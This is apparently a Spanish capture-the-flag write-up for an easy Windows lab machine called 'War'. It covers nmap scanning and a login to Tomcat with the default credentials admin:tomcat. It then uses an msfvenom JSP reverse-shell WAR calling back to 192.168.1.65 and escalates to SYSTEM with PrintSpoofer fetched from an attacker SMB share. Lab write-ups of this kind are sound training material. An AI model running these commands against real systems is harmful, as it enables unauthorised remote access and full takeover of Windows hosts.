War
🔍 Dificultad: Fácil
🔍 RECONOCIMIENTO
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 192.168.1.74
para verificar la conectividad de red.

A continuación, se realiza el comando:
nmap -p- --open 192.168.1.74 --min-rate 5000 -n
para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo, los puertos 135, 139, 445, 5040, 8080 y varios en el rango 49664-49670 están abiertos. Estos pertenecen a los servicios de Microsoft RPC, NetBIOS-SSN, Microsoft-DS, HTTP-Proxy y otros puertos desconocidos, por lo que a continuación se indagará más.
🔎 EXPLORACIÓN
Se utiliza el comando:
sudo nmap -sCV -p8080,135,139,445,5040 -v 192.168.1.74
para obtener más información sobre ese puerto específicamente.

Revisamos el puerto 8080 y encontramos un Tomcat.

Nos logueamos con las credenciales por defecto de Tomcat.
admin:tomcat
🚀 EXPLOTACIÓN

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.65 LPORT=443 -f war -o reverse2.war
Lo subimos y nos ponemos en escucha.

🔐 PRIVILEGIOS
whoami

La cuenta NT AUTHORITY\Local Service posee el privilegio SeImpersonatePrivilege, lo que le permite suplantar la identidad de otros procesos en el sistema. Este privilegio es potencialmente explotable en ataques como Juicy Potato o PrintSpoofer, que permiten la escalación de privilegios en entornos Windows mal configurados. Se recomienda evaluar los riesgos y aplicar las medidas de seguridad adecuadas para mitigar posibles vulnerabilidades.

Transfiero el ejecutable PrintSpoofer64.exe al sistema objetivo
mv /home/beafn28/Descargas/PrintSpoofer64.exe .
impacket-smbserver a . -smb2support
Lo subimos.
cd %TEMP%
copy \\192.168.1.65\a\PrintSpoofer64.exe PrintSpoofer64.exe
Ejecutamos. Ya somos root.
.\PrintSpoofer64.exe -i -c cmd

Last updated
Was this helpful?